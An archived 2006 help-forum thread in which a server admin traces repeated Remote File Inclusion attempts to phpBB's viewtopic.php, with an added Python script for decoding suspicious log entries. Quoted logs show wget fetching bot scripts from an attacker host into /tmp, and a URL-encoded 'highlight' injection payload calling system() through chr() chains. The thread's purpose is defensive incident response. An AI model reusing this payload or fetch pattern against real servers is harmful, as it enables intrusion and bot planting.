Solved

How do I find a script being used as a "Remote File Inclusion" exploit on my server?

Posted on 2006-05-01
288 Views
Last Modified: 2010-04-22
How do I find a script being used as a "Remote File Inclusion" exploit on my server? Every few seconds the error log shows an entry like this.


--16:19:54--  http://mobile-portal.info/myfiles/expl/linuxday.txt
  (try:13) => `/tmp/.girl'
Connecting to mobile-portal.info[88.212.221.4]:80... --16:19:56--  http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
  (try:14) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80... --16:20:04--  http://mobile-portal.info/myfiles/expl/linuxdaybot.txt
  (try:13) => `/tmp/.girl2'
Connecting to mobile-portal.info[88.212.221.4]:80... failed: Connection timed out.
Retrying.

failed: Connection timed out.

Obviously my firewall is preventing it from completing its IRC planting mission - which is great - so nothing is actually getting dropped into my /tmp folder while the firewall is up and running, but many bots out there are automatically trying my defenses all day, and they are all using the same script on my server to access my server, but I can't find a trace of what they are using to access it. Either the script is an innocent and exploitable script that belongs to a regular product like a forum, or it was planted there by a malicious user.

I have successfully used netstat and grep to determine the IPs of many of the machines that are trying to get in, and I have added those IPs to my iptables to stop them, but new ones keep showing up, so something exploitable is sitting on my server. I have 1000 websites on this server, so I can't just say "oh, it's my forum script that needs upgrading" - I need to figure out how to search for a log record somewhere that would have the actual event and file location of the exploit.

I've asked a number of my super Linux tech friends and have come up empty handed so far.

Any ideas? I've been scratching my head for 4 days trying to come up with inventive ways to find the culprit.
Question by:gerrybakker

6 Comments
 
LVL 15

Expert Comment

by:m1tk4
ID: 16582484
Well, if you have the IPs to add to iptables as someone breaking in, why don't you grep all your 1000 apache log files for these IP addresses and see what files they are accessing?

Also, it's not clear WHAT error log shows this - is this your apache error log or something else?

Author Comment

by:gerrybakker
ID: 16583263
m1tk4, thanks for the forehead-slapping obvious answer - "check the 1000 apache logs". It was staring me in the face, but I couldn't see the trees for the forest. It was just too obvious.


After identifying the IP addresses I then did a grep for those IP addresses in the /var/log/httpd/domains folder to find the scripts that were being used.

grep -n -r -I "221.169.150.160" *

The results showed extended character codes in the string to hide the real string. You would never know or find the text string "http://mobile-portal.info/myfiles/expl/linuxdaybot.txt" in this result, but it didn't matter because it was definitely the IP address that was running the wget session. Mystery solved.

Sample line found in the log with the correct IP address:

mwarriors.com.log:242:221.169.150.160 - - [01/May/2006:08:57:24 -0700] "GET /phpBB2/viewtopic.php?p=194&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"
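An added example, not code from the thread, that automates the triage step described above: it parses Apache combined-format lines (including the "file:line:" prefix that grep -n -r prints), URL-decodes each query parameter as many times as needed, flags values that contain a PHP command-execution call, and reassembles chr() chains so the obscured text becomes readable. The sample line is the request quoted above; the parameter-name list in EXEC_RE is an assumption about what is worth flagging.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample: the viewtopic.php request quoted above, as `grep -n -r` prints it.
SAMPLE_LINE = (
    'mwarriors.com.log:242:221.169.150.160 - - [01/May/2006:08:57:24 -0700] '
    '"GET /phpBB2/viewtopic.php?p=194&highlight=%2527%252Esystem(chr(112)'
    '%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)'
    '%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)'
    '%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)'
    '%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)'
    '%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)'
    '%252Echr(34))%252E%2527 HTTP/1.0" 200 23026 "-" "Mozilla/4.0"'
)
# Apache combined format, with the optional "file:line:" prefix that grep -rn adds.
LOG_RE = re.compile(
    r'^(?:[^\s:]+:\d+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# PHP command-execution functions; any of these inside a query string deserves a look (assumed list).
EXEC_RE = re.compile(r'\b(system|passthru|exec|shell_exec)\s*\(')

def decode_fully(value, max_rounds=3):
    """Undo repeated URL encoding (%2527 -> %27 -> ') until nothing changes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def chr_chain_to_text(php_expr):
    """Reassemble a chr(112).chr(101)... chain into the string it builds."""
    return ''.join(chr(int(n)) for n in re.findall(r'chr\((\d+)\)', php_expr))

def analyze_line(line):
    """Return the client IP, the script hit and any suspicious parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('path'))
    findings = []
    # parse_qs does the first decode; decode_fully strips any further layers.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            decoded = decode_fully(value)
            if EXEC_RE.search(decoded):
                findings.append({'param': name, 'decoded': decoded,
                                 'hidden_text': chr_chain_to_text(decoded)})
    return {'ip': m.group('ip'), 'script': url.path,
            'status': int(m.group('status')), 'findings': findings}
```

Feeding the output of the grep above through analyze_line shows, per request, which script was hit and what the chr() chain actually spells out, which is the information needed to decide which installation to patch.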

Author Comment

by:gerrybakker
ID: 16583285
Apparently - in this case it was the viewtopic.php file in phpBB that was being exploited.
LVL 15

Expert Comment

by:m1tk4
ID: 16585351
>>it was the viewtopic.php file in phpBB

Exactly.
LVL 15

Expert Comment

by:m1tk4
ID: 16747503
And why would it be a refund? I certainly object.

Accepted Solution

by:
GranMod earned 0 total points
ID: 16778327
PAQed with points refunded (500)

GranMod
Community Support Moderator